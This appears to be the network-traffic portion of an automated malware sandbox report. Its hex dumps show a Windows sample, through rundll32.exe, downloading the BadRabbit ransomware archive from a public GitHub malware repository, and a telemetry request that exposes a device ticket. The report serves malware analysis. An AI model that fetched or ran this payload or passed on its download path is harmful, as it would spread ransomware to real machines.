                                                                                                                                                    2022-09-29 12:58:52 UTC834INData Raw: 89 84 13 85 a1 7b 72 38 0d 79 82 1f 21 ab 93 76 8b 71 80 0f 61 27 4e 5f 2a bb 03 85 07 01 97 8e c3 c3 b5 f1 d5 fa 28 58 7f 74 21 c8 8e 4f 36 90 bd eb c5 1b 6d fd 81 f1 ba 53 c2 a4 a5 b8 4e 9f 6f 10 3d 11 e4 37 1c 06 ba d4 ac e3 f0 1e 4e 07 e9 57 02 43 b6 db 5e 07 9c 6b cf 5f 26 a6 dd 3c ff c6 dc 03 d7 e4 a8 ee 70 4e 3a 5c 03 e4 5b 1c 63 1c a2 38 28 12 10 66 2b a0 61 96 fe 41 0b e5 04 99 26 8e 93 ca 08 ff 55 89 35 03 49 34 22 74 ac 8c 88 63 12 b3 24 b6 9b d6 99 6f 16 8c 8e 74 0c d7 bf 4d 82 16 90 54 6b 6d 7b 67 c4 f3 89 33 9c e7 f8 d6 2c 55 3a 36 3a 11 ed 40 c0 4b 9c c3 40 80 1a df 01 38 6b 6d f9 a0 a0 75 4e 2e 40 52 2c ae e5 89 bd 47 05 0b c3 49 c3 91 41 30 16 0e d4 1a ef 35 cf a7 f4 7e 56 39 a5 33 34 34 96 f4 02 8d 92 77 7b 54 b6 a4 99 ce 06 cd 06 9a ae
                                                                                                                                                    Data Ascii: {r8y!vqa'N_*(Xt!O6mSNo=7NWC^k_&<pN:\[c8(f+aA&U5I4"tc$otMTkm{g3,U:6:@K@8kmuN.@R,GIA05~V9344w{T
                                                                                                                                                    2022-09-29 12:58:52 UTC850INData Raw: 3b 08 84 e1 6b c4 3e 5f 67 fe 11 be bd 29 a3 f0 eb 61 80 83 b5 a4 a6 43 c4 89 97 7b 87 02 6b b5 a8 ae 69 72 04 9a 2a 63 c7 e2 2f 1a 6f 40 60 14 08 1f c1 98 ba 0c 4d 8e df e0 19 94 8f c6 ba df 31 6e d1 a6 25 8d 21 5b 38 39 6b 11 6b f8 4f b3 4a 01 10 3a b7 a5 32 92 d5 42 75 dc 98 54 a2 e7 02 c8 91 56 38 59 c0 35 cb 5a 34 0d 17 a7 ff f7 bf 22 94 49 b4 b1 0b e9 5c d8 2d 20 8f b2 58 45 5c 71 7d 4b 39 26 7e 06 24 05 19 1a 3b a5 cc ec 66 61 43 76 2a 71 00 8d f6 f5 f6 f6 4c a9 e3 63 01 75 43 9c e7 14 14 2e 18 e7 ac 9c be f3 cc 4e 13 4b ab 6b b0 19 bc bb 33 d4 e4 f5 b3 81 d4 5e ee cb 1b c7 da 47 33 d5 06 ff ba b3 d1 49 69 bb 27 d2 85 de ce 1a bd 99 20 63 78 6b ac 38 64 ae f3 54 5b f7 e4 da d4 c4 25 3d 83 d8 14 11 75 48 21 03 5b ae 62 33 49 51 24 31 97 dc 0a fb cf
                                                                                                                                                    Data Ascii: ;k>_g)aC{kir*c/o@`M1n%![89kkOJ:2BuTV8Y5Z4"I\- XE\q}K9&~$;faCv*qLcuC.NKk3^G3Ii' cxk8dT[%=uH![b3IQ$1
                                                                                                                                                    2022-09-29 12:58:52 UTC866INData Raw: af d3 83 a8 89 7d f3 d3 95 c9 7b ec ef 87 c7 4c 8a fd 37 37 58 eb e5 9a 74 24 15 2b f3 b4 44 c2 49 14 45 97 6b 7d 4d fb 68 63 85 b2 04 83 ac d3 8f 65 1c 69 0a e8 93 1e 9d c8 81 4e 4d 0a 0c ea 10 31 53 5c fd db 24 70 62 6f 64 0e 5a a7 6e ab d1 3c 8b 5e cc b1 fc 1b 55 2f e7 9e d2 fc b7 c6 7f 31 35 4d e8 eb 17 13 75 5f 9c 02 2c fe 34 c9 a2 02 1b ed d5 85 ea 3b 83 02 c5 35 22 f7 7b f3 a7 be 70 f9 42 3b b1 dd 7b 35 3f 3a 82 4e 2e 61 3e 5b af 69 e3 5f 11 44 28 3f 50 7d 77 a9 37 ef 8a 7a 98 20 ab c1 05 2a ef 10 55 88 9d e2 f5 71 a8 3a 3a b3 87 32 2b 93 5d 32 1a 69 6c 87 5a da 55 3e 6e 32 13 68 f9 f1 63 fd 15 e1 ee 50 26 3f 08 f3 34 eb ca 57 da 0a 83 79 b7 d4 cb 55 7a 6e af c6 7d b6 0e 20 71 8e 04 d1 e4 fb 4b dd 72 c0 8d 7c 9f 78 33 20 de db a3 07 9b 5e 2c d4 a6
                                                                                                                                                    Data Ascii: }{L77Xt$+DIEk}MhceiNM1S\$pbodZn<^U/15Mu_,4;5"{pB;{5?:N.a>[i_D(?P}w7z *Uq::2+]2ilZU>n2hcP&?4WyUzn} qKr|x3 ^,
                                                                                                                                                    2022-09-29 12:58:52 UTC882INData Raw: 76 71 b8 e1 5e a2 af 5f b8 db 35 47 91 6e 03 43 b1 f8 d7 10 a7 9d 2f 6c aa a8 c5 8d 41 17 10 52 a9 3e 3a 30 7f 27 82 a6 5a c9 94 77 86 44 5a cc 1f 91 db b4 10 78 a2 98 65 24 a1 93 a2 ba 6e 84 48 46 98 11 41 d5 c8 ed e0 9d af dc 05 ad 79 cc b1 66 bd 92 40 4e d7 0f 32 49 f9 a7 ce 74 b6 50 6f d7 73 2c 07 4b 66 af 25 4a 9b 49 25 20 92 d5 01 d9 7c 65 18 c6 ca db 6b 3e da 99 00 53 80 12 d8 18 69 a8 62 09 6e b9 92 68 01 81 d1 4b 6a 00 29 cf 91 61 3c 3d 34 9a 64 ba 97 cf 32 fd 9c 21 65 35 de b3 c3 df 87 21 6f 55 00 68 02 7b 7b aa 1f 4f 5b 12 e5 e4 46 a9 b6 7e e6 2a 2d 0d a9 c8 25 39 44 e2 43 e8 54 56 72 25 23 97 f7 79 44 a3 37 37 bb c0 71 1b 13 a8 d9 4d d9 9e 42 00 1b 3a 78 a6 6d ff be f9 bb ca 0d a1 9a ee a3 b2 2d cc 9e da 7b 35 db 47 c0 4a f5 3e b3 9f f8 cc eb
                                                                                                                                                    Data Ascii: vq^_5GnC/lAR>:0'ZwDZxe$nHFAyf@N2ItPos,Kf%JI% |ek>SibnhKj)a<=4d2!e5!oUh{{O[F~*-%9DCTVr%#yD77qMB:xm-{5GJ>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    160192.168.2.34989120.189.173.21443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 13:01:27 UTC38896OUTPOST /Telemetry.Request HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    User-Agent: MSDW
                                                                                                                                                    MSA_DeviceTicket: t=EwC4AlN5BAAUx7kvJOvlZVsOh3du+AzMGpNViggAAQyg68hNd+pS9Cokwe9Vycw1xUmHLVSWEzL3ILk4ELKDB0EcA/Y5BMquB/Vr4wAzUg5izvEikn5Ygt0TdscvgTm/QeZEM03mTZb3cKyj6JF1AwIm0XjNFKOEJ2wiwyfJL3u7TQr3sGIFa48jJehodEV4DgGnOT77rplQNF9nix+Q67MOQO6E+nA91CE/gq12KW+C9IQOkWidi/EdkAgDryv6RYqXkuZmfl7p0kuXn6c8t2nK8sCAsMLbv7BXw4x2MOoR8EO97cdJHi/VZzqzuClMiFxYHJtSRtliL372+qEBnsU+EnPOOrL/z/ZiHPENFKIkRPbb/8l6KkMvLzfeI2cDZgAACNOqKCTKkDaTiAEAiCbHfOZdk37ebs4z9YlWK0ggABm5rlJR8mqKoukm5s59WGiTEsqaTsEqSuTQyAMtNdco9DDEAvt4+UMabUuNVDEWqzFfrHVrSdvQYjsDapDi7Pbjmu7yRtHNbrcghaauEFGvYmKB1OojJfqVlDlWn/kqifa1Q4NFlFw6WHgVAEgJlDC8ClLbpH9UlTeh3+xKs97H8FWS5YOaaMhWsjgMoBKupsWUsYgnaK0nOm640mhdaqhVns4fhXbe15xBWB1dmuDf692q8AqeBxx7Gj3D2e5z4hCLVGBWOzS+dlAggdr7HR/xo6TZoa1w0Uy+ha3Kc7+iHfFWH8U1SdI3ZiUzpvWZRT9p9Le/WWEhKvVrrHDYHWsUyVV94CvHzB2L6bfeAfFQJQE5yXQCxMvx6MbguJX2Yp84PBovQJfaNqSXR32KdTi12J/iQd2uTgVk0y6lvTSKrxN08DBFWr9qfPWF7wM89QXseKP8nHDXjPEjgimbyp8FAH0QrqADB29FmuasrPKg//o80bgB&p=
                                                                                                                                                    Content-Length: 4607
                                                                                                                                                    Host: watson.telemetry.microsoft.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    161192.168.2.349892140.82.121.3443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 13:01:28 UTC38897OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/BadRabbit.zip HTTP/1.1
                                                                                                                                                    Host: github.com
                                                                                                                                                    Connection: Keep-Alive


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    162140.82.121.3443192.168.2.349892C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 13:01:28 UTC38897INHTTP/1.1 302 Found
                                                                                                                                                    Server: GitHub.com
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:59:31 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                    Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                    Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/BadRabbit.zip
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                    Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                    2022-09-29 13:01:28 UTC38898INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                    Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    163192.168.2.349895185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 13:01:29 UTC38899OUTGET /Endermanch/MalwareDatabase/master/ransomwares/BadRabbit.zip HTTP/1.1
                                                                                                                                                    Host: raw.githubusercontent.com
                                                                                                                                                    Connection: Keep-Alive


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    164185.199.108.133443192.168.2.349895C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 13:01:29 UTC38899INHTTP/1.1 200 OK
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 402632
                                                                                                                                                    Cache-Control: max-age=300
                                                                                                                                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                    Content-Type: application/zip
                                                                                                                                                    ETag: "004f09a50a54351833511d1b99db3436b26a72d8e149d6c13dd20a27fe83f3a9"
                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    X-GitHub-Request-Id: 5618:1220:101AF1B:11175EB:63359687
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Date: Thu, 29 Sep 2022 13:01:29 GMT
                                                                                                                                                    Via: 1.1 varnish
                                                                                                                                                    X-Served-By: cache-mxp6959-MXP
                                                                                                                                                    X-Cache: HIT
                                                                                                                                                    X-Cache-Hits: 1
                                                                                                                                                    X-Timer: S1664456489.076062,VS0,VE1
                                                                                                                                                    Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    X-Fastly-Request-ID: 2020457776518df65f72362991eca71df33bb103
                                                                                                                                                    Expires: Thu, 29 Sep 2022 13:06:29 GMT
                                                                                                                                                    Source-Age: 161
                                                                                                                                                    2022-09-29 13:01:29 UTC38900INData Raw: 50 4b 03 04 14 00 01 00 08 00 81 a9 58 4b a5 c9 a1 5f 12 24 06 00 2b be 06 00 18 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 42 61 64 52 61 62 62 69 74 2e 65 78 65 01 be e1 49 53 97 20 1c fa c3 6c 18 29 d1 f4 f7 b9 c1 0f c2 9d 6d e2 a3 7f 5f 80 37 a1 bf 46 53 1e 79 43 c5 68 f0 2d 6f a5 6c bc 0b d3 34 e8 37 46 4f 1d 09 b7 a5 d6 3f 8f 58 ab 3e 2a 6b e8 1c 51 80 2f 2b 06 5f 55 e5 78 40 db b9 ba f4 53 46 d8 d7 32 07 89 19 21 37 5e 46 a7 76 3d 2e 65 bc d2 d4 da f9 17 a2 91 f7 2a 17 53 56 14 07 fc 80 61 6e be 20 45 b9 a6 61 66 fa 0e e1 ab 52 4b 8f 7a 5f 56 4d 81 a4 45 ec fb 8c c3 9b b1 0c 2c 9f ac be 4e 92 81 00 98 1f 9a 78 44 7b 7e 07 bf be 1f 74 1e c3 72 cc ca b4 be 8c f1 ec 6f e7 14 34 c2 be ff d4 80 dc 69 5f 70 f5 e0 9e cf 53 02 80 3a 32 88 09 e4 9a 07 df 28
                                                                                                                                                    Data Ascii: PKXK_$+Endermanch@BadRabbit.exeIS l)m_7FSyCh-ol47FO?X>*kQ/+_Ux@SF2!7^Fv=.e*SVan EafRKz_VME,NxD{~tro4i_pS:2(
                                                                                                                                                    2022-09-29 13:01:29 UTC38916INData Raw: 72 c8 31 c2 9d f7 2e 41 53 ac c7 27 ce 6b c8 aa ef 81 64 8e b4 61 a3 68 c9 b2 4f 51 0f 0c d0 0b 4c 71 6f ed 6f 20 9a 1c 07 c1 6d 4b ad 82 2e 0c d8 76 e0 4e c7 34 dc 23 56 fe 18 59 7d 9d 34 7a 07 81 2e 22 f6 07 d6 af 92 93 9e 99 79 2c 0b b5 1d 5d 9f 43 60 6b 35 90 10 b0 c8 29 dc 00 bb 73 51 54 95 38 6c 8c 8f 1a 0c 72 e7 4d 5b b9 96 5b f8 d4 55 f8 09 c0 2a 6f 2d 76 fb 69 8d 7a f1 e9 d7 35 17 79 fe 2e 8d 55 4d c4 34 a7 1b 02 fe 6e da 8b 97 a7 6e 37 9d 8e cd ae 2b 76 01 4d 9e 15 87 c4 e4 66 02 e2 98 84 31 d0 d4 14 3d 69 e4 12 90 c3 81 a2 a1 71 8a 43 d3 5b c6 fb 0f 0a 40 50 0f e0 8e 4a 58 d9 62 7b 0b 99 1d df 17 a6 67 a8 30 f0 a7 69 b9 75 d6 77 57 ef e2 8b a1 25 9f 21 41 dd f6 20 66 52 70 20 57 c0 71 32 bf ee 40 86 cb d3 32 03 76 87 d4 20 f2 0c 0a 9e 32 dd 55
                                                                                                                                                    Data Ascii: r1.AS'kdahOQLqoo mK.vN4#VY}4z."y,]C`k5)sQT8lrM[[U*o-viz5y.UM4nn7+vMf1=iqC[@PJXb{g0iuwW%!A fRp Wq2@2v 2U
                                                                                                                                                    2022-09-29 13:01:29 UTC38932INData Raw: df 68 45 73 e0 48 d9 9a 68 44 7f cf 25 7e 2c f7 a7 f0 68 54 12 ed d0 2a 22 31 10 ac a1 e1 77 4c 42 a9 31 71 f8 97 16 75 01 a1 1e e1 e1 17 fe 10 23 57 f6 34 80 ff 56 f2 aa 8a 75 ce 91 d4 8c 17 b0 44 67 6d fb 81 09 a0 08 4a fe 24 1e 2f a0 22 14 da d0 bb eb 65 1c fe 98 44 82 fc 8d e5 aa 15 d7 39 42 ae ee c7 8d d4 a1 d4 02 21 3b 0b 24 38 c4 0b d7 38 98 f6 c4 fc a6 80 1d 85 23 73 a9 a9 15 94 27 53 8a 2e 99 55 5e d4 a2 78 66 8e 6d d4 f6 02 ed 7e 13 40 15 8b b9 82 b2 dd 13 fb f0 5b 1e 54 0f 2e 43 8b ca 26 60 fe a3 8e 21 1a fa df 98 d7 6a 59 63 d7 16 27 df f6 07 fe 81 80 1b f1 18 90 3b 3d 7f 64 eb 30 2b d7 59 85 a0 c7 bf 41 be d8 4a d4 0e bd 61 31 21 ea 8f c9 86 ad 0f 6b 39 52 a9 14 fd f1 7d 1f fc 66 70 5c b7 2a 1f d3 7d 54 f2 17 8e a5 98 7e 5b 75 54 c0 49 10 62
                                                                                                                                                    Data Ascii: hEsHhD%~,hT*"1wLB1qu#W4VuDgmJ$/"eD9B!;$88#s'S.U^xfm~@[T.C&`!jYc';=d0+YAJa1!k9R}fp\*}T~[uTIb
                                                                                                                                                    2022-09-29 13:01:29 UTC38948INData Raw: c3 a0 6b 5f 9d ce 11 cf 59 14 7f b2 aa 14 34 99 4d ce 0c a5 85 81 79 45 d1 74 4a 6f 00 aa e4 8c 0e 69 de 4e 90 e7 67 97 7d 3a d9 6b f2 d5 9a 38 fb 8f f7 c0 52 ae 61 47 33 08 16 e3 39 ee ee c8 96 3c 11 6c 39 ba 9a b8 7a 07 c4 d8 f2 f7 97 b1 15 17 ff a2 1a dd f1 7e 85 38 2f 9d e5 80 f3 9f b3 d8 5b 23 1b 2a 83 4b d6 52 de b1 99 e2 e9 f5 41 77 0e 1b 02 6f 18 79 c1 5a 06 84 21 c6 39 b2 28 51 0d e3 1a 6a 8a 22 b1 52 ba 7f a3 10 23 0f 18 f4 9b 7f 22 38 8a 2e 9b cb 3a b1 01 19 21 17 c9 ec 7d 6a a8 f1 4a 1b 2a a1 1f b8 83 72 e1 9b ef eb ae 43 20 62 15 6e 87 c4 84 92 cc 79 4c 84 fa b4 10 67 22 48 cd b7 58 d7 8a 11 c3 48 64 fd 1f f6 92 0a ce f6 1a 5f 92 30 a1 92 09 2d 29 75 d9 45 d3 73 d6 61 82 68 6f d7 f8 a1 50 01 d4 f6 b9 38 c0 2f 02 24 0f 42 83 46 db bc b6 e2 80
                                                                                                                                                    Data Ascii: k_Y4MyEtJoiNg}:k8RaG39<l9z~8/[#*KRAwoyZ!9(Qj"R#"8.:!}jJ*rC bnyLg"HXHd_0-)uEsahoP8/$BF
                                                                                                                                                    2022-09-29 13:01:29 UTC38964INData Raw: d3 e8 b3 a5 57 bb 0f 80 8e 4a d0 94 cd 31 b7 fc 52 9b dd ec 1d 0e df e2 b2 72 10 11 45 d0 13 e7 46 73 0e ee 88 25 59 a0 87 52 2a 7f f1 c9 04 38 b2 8a 86 e3 55 b0 df 6d 8e 1c 77 b0 01 ac 10 05 04 6b ae 2b 3b 5e bf 4a ed 73 d8 ab d3 cf fb a8 6e a2 bc 4f 41 2d c4 15 83 39 f0 dd 86 d1 ca 20 b5 c3 a8 59 39 4c 02 66 11 12 8e 3d b1 f1 60 78 f2 6b e1 ac 59 82 ea 00 59 c1 52 94 4e 15 f8 64 8a cb b7 a7 02 ac 35 7d a2 41 76 da e4 c6 75 30 50 5a d7 bc ec 8f b5 23 13 c9 ba fb ef 45 7f eb 5a e2 8f 23 36 26 7f 40 df 34 a3 e1 62 b2 12 aa ad e7 23 b5 ca 8b 71 b0 44 0a 27 af dd 1e 19 7d 21 dd be 40 7a 66 f1 99 77 2e 7c dc 11 fd 78 b3 18 30 1a e9 85 ba 8d ad 5b f5 01 38 d7 04 ee 9a 7d 9b 2d 3a 21 53 ff 71 58 63 ea e3 5d 5b aa d2 86 cf c9 f7 50 41 78 22 be a2 af af 77 21 ea
                                                                                                                                                    Data Ascii: WJ1RrEFs%YR*8Umwk+;^JsnOA-9 Y9Lf=`xkYYRNd5}Avu0PZ#EZ#6&@4b#qD'}!@zfw.|x0[8}-:!SqXc][PAx"w!
                                                                                                                                                    2022-09-29 13:01:29 UTC38980INData Raw: 9f 8c 81 5a e1 61 65 95 8f cc a2 6e e0 37 5b 40 bf cf de df 7f 30 4e c4 a4 a4 14 6c a5 a4 3e 3b 32 39 ff 30 2f c3 ed af 76 75 0a a1 44 6b d1 d5 e7 ce 30 e9 f3 b2 51 21 30 02 31 4a 3a f3 7d 4c 47 9f 37 81 61 20 f0 24 e0 40 e2 f4 11 69 06 c1 e5 da 68 f6 69 da f1 a8 6a f0 d5 a3 85 b1 b1 09 83 b7 cb 7a 5c 58 d7 9d 8e c4 83 37 08 26 88 ca 0b bd 39 13 32 c4 8f 4a 58 c4 bc bb b9 ec bb fd 1a 09 ac ed 3b 04 a3 46 1a ed 64 16 1a f8 bd ba 5e d2 6b cb 90 6c 03 35 4f 84 50 70 ad 4a d0 df 47 d5 45 6b af 9d d4 e0 9b 68 3f 90 45 96 04 05 49 ea 2d 74 67 09 3f f6 24 51 df 6c 99 ec c5 8c f6 9d 59 93 1f 24 5d 0c 81 bb 8a c2 bc 3b 5d 69 ba 18 5e f1 aa 37 5c a9 5b d7 6f 6c 1c ba 02 d0 af 63 c7 70 af 52 c8 45 95 ee 6b 4d 68 57 cc c4 33 db 39 a3 05 b7 b7 6e 10 0b 85 9f aa 69 12
                                                                                                                                                    Data Ascii: Zaen7[@0Nl>;290/vuDk0Q!01J:}LG7a $@ihijz\X7&92JX;Fd^kl5OPpJGEkh?EI-tg?$QlY$];]i^7\[olcpREkMhW39ni
                                                                                                                                                    2022-09-29 13:01:29 UTC38996INData Raw: 11 1b be 72 2a 9b ac 24 a6 6f d8 66 50 56 81 1f 92 36 08 2a 93 7a dd 7d 06 0e 44 95 94 0a 7e 98 74 6f fa db 94 31 1c c4 1f b4 1d 86 a4 a1 d1 e1 40 d4 9d ad 4b 7d 69 4c f8 2b 15 ac 29 1f c3 92 8c 8c c3 d5 39 a7 cb ce 0a 54 1b 9c 7a 06 85 95 e4 1f a6 6d 48 ba d3 e7 ec e4 f7 d9 e6 03 bf ea e1 48 7f fc 76 cd 8d e7 d5 6f 81 b0 40 29 89 24 11 52 7a c4 89 a8 dd ca 01 9b 14 cd 66 89 e5 5b 32 ef 55 90 2d 79 f7 ae 4f 50 2c 2d 9d da a7 a3 ee f8 e5 2e 08 2d 9f e0 7e 3e 38 67 38 30 2a 9c de 08 b3 ba aa 0d da 44 d4 22 04 bc 5f 6b 86 76 73 da 6a 0c 5c c5 7f 72 5e 25 dc 19 fa 32 9a 0d b2 94 07 a0 01 18 eb a7 77 02 48 54 66 d4 06 42 86 45 c6 28 97 b7 29 76 b6 e9 77 3d ec 66 42 ba bb 7d 87 b2 e0 b3 26 05 14 57 20 e7 ed 14 2e b6 0b 80 70 2b 3c d2 30 8d 0b 60 28 c3 23 b3 31
                                                                                                                                                    Data Ascii: r*$ofPV6*z}D~to1@K}iL+)9TzmHHvo@)$Rzf[2U-yOP,-.-~>8g80*D"_kvsj\r^%2wHTfBE()vw=fB}&W .p+<0`(#1
                                                                                                                                                    2022-09-29 13:01:29 UTC39012INData Raw: 4c 03 ef 99 74 d7 04 e0 e0 eb 91 00 43 79 ac f2 18 2a f3 47 5c d6 d7 27 b0 25 da 87 01 ba 70 e4 5a ff 63 9d d6 b7 ae d1 3c 37 78 cb a8 7f b9 75 b1 29 51 83 cb 06 19 40 74 c2 3b a8 21 2d 7e 8d 82 40 19 00 9f e0 6f 41 20 76 0a a7 3a a1 e5 90 94 2e 75 f5 05 9f 6a 18 d2 46 7a e2 78 47 0c 9c ac 7c 38 b9 3a c9 63 9a a9 2a 81 83 a3 45 01 b0 55 f6 81 42 82 16 05 e0 a3 b3 3e 51 e1 af 65 81 69 99 94 a2 4f 08 0e 28 5f c1 e8 85 9c 79 f3 99 b6 11 eb 2d 99 23 be 0b d0 2a 65 12 97 15 6f a3 57 3b 09 1a 94 1e 0f e4 c6 12 87 fb aa 4b 26 7d e0 e3 40 ba 57 4d ee 09 67 a3 a0 19 71 43 ac bf 27 71 d4 ef 7c 09 e3 7e 45 fe a1 00 d9 c7 41 71 79 0b 2c ad 50 7f c3 31 25 2d 2f 1c 3f a5 b0 43 5a c4 8c f2 72 70 fe 91 a4 53 8d 0e cc 34 f2 2c 8e ce 3a 82 07 4a fd 47 4f 20 c4 80 fe 78 e6
                                                                                                                                                    Data Ascii: LtCy*G\'%pZc<7xu)Q@t;!-~@oA v:.ujFzxG|8:c*EUB>QeiO(_y-#*eoW;K&}@WMgqC'q|~EAqy,P1%-/?CZrpS4,:JGO x
                                                                                                                                                    2022-09-29 13:01:29 UTC39028INData Raw: a6 bf 07 22 95 8f 84 94 f9 f2 00 f4 0d f9 f4 e9 ab 4a 6a aa a8 af e8 ce d6 75 e0 e4 13 2f 28 e3 71 79 43 65 a2 dc 48 b3 74 9a ab e5 6f df 91 5f 22 88 d4 20 57 c7 d6 53 06 78 a9 21 9f 02 23 7d e4 59 1f c2 93 37 e8 9e da 71 57 25 8c ba c2 c4 79 44 67 a5 de c3 e9 47 e8 65 79 14 d4 92 2d 63 2d 75 0b 89 a3 8f c7 ab 8b d4 c5 8d 41 f4 03 b0 e1 e5 ec 74 82 a7 60 43 12 cd 63 97 34 81 68 24 b0 c9 15 f9 ad b8 c8 24 b4 c6 de d5 d7 05 bd 03 f7 6e b9 6f bc e5 8a 54 38 77 b7 b4 e2 bd a3 d9 3f 83 d9 42 8b fc a4 6d e0 91 ac 50 c7 ea e8 47 50 75 88 23 37 cd 02 fc 48 24 97 e7 3b 34 22 92 bd 19 16 1f 42 f8 06 c4 d9 a3 88 b1 70 7f 5c 0e d7 28 f2 43 2c b1 92 65 80 85 7a a6 a1 6d 73 c1 c7 38 3a fb c6 ef e5 98 35 22 37 b4 9c b9 68 a1 22 75 eb c7 e3 e4 74 fa 7f c8 f2 b5 98 16 ed
                                                                                                                                                    Data Ascii: "Jju/(qyCeHto_" WSx!#}Y7qW%yDgGey-c-uAt`Cc4h$$noT8w?BmPGPu#7H$;4"Bp\(C,ezms8:5"7h"ut
                                                                                                                                                    2022-09-29 13:01:29 UTC39044INData Raw: 5e 17 75 6c b3 25 52 16 be 6b cf 2f 3b 84 7a 4f 54 34 3b 54 7c 87 fc 4d df e5 3a 95 42 56 ce c9 3e 90 0a 0b 3c 46 db 0d 38 e7 ea f2 18 b5 cf 4e 58 24 da d8 2f 04 e3 68 58 66 28 6e e1 1f a4 6b 82 f5 5c a5 37 ee 55 3f 21 6a 76 dd f3 aa f5 b0 39 c4 e5 11 15 c1 3a d4 eb e0 92 3a 9c 27 40 2b d2 a0 ae 4e fe 70 be d0 12 fc 5b cc 92 99 5c 2e be 14 e1 1e fd 43 7f f1 b3 64 a6 24 11 d1 93 94 4e ac 26 fe 9b 8a f3 95 b7 ba 6c 50 41 e3 8c b6 19 51 66 ae a9 70 a0 55 63 36 69 87 e6 d7 cc f4 56 9e fc a7 c3 26 7b ce 62 2e 69 99 e1 6d ab c0 da 7d d4 8c 28 2a 46 51 04 70 84 f3 46 d6 24 44 1f 4b 21 99 5c 43 29 c0 f5 4b b4 51 cd 91 f5 fb 2d f8 ec 50 28 19 63 d2 3d 75 a9 d5 58 8f b1 f6 5b d6 da 8c 50 5a eb 7a 9e 1b 8f 72 2a 12 cd 5f d1 27 32 74 28 1b f9 31 29 82 cd e6 8a 89 5e
                                                                                                                                                    Data Ascii: ^ul%Rk/;zOT4;T|M:BV><F8NX$/hXf(nk\7U?!jv9::'@+Np[\.Cd$N&lPAQfpUc6iV&{b.im}(*FQpF$DK!\C)KQ-P(c=uX[PZzr*_'2t(1)^
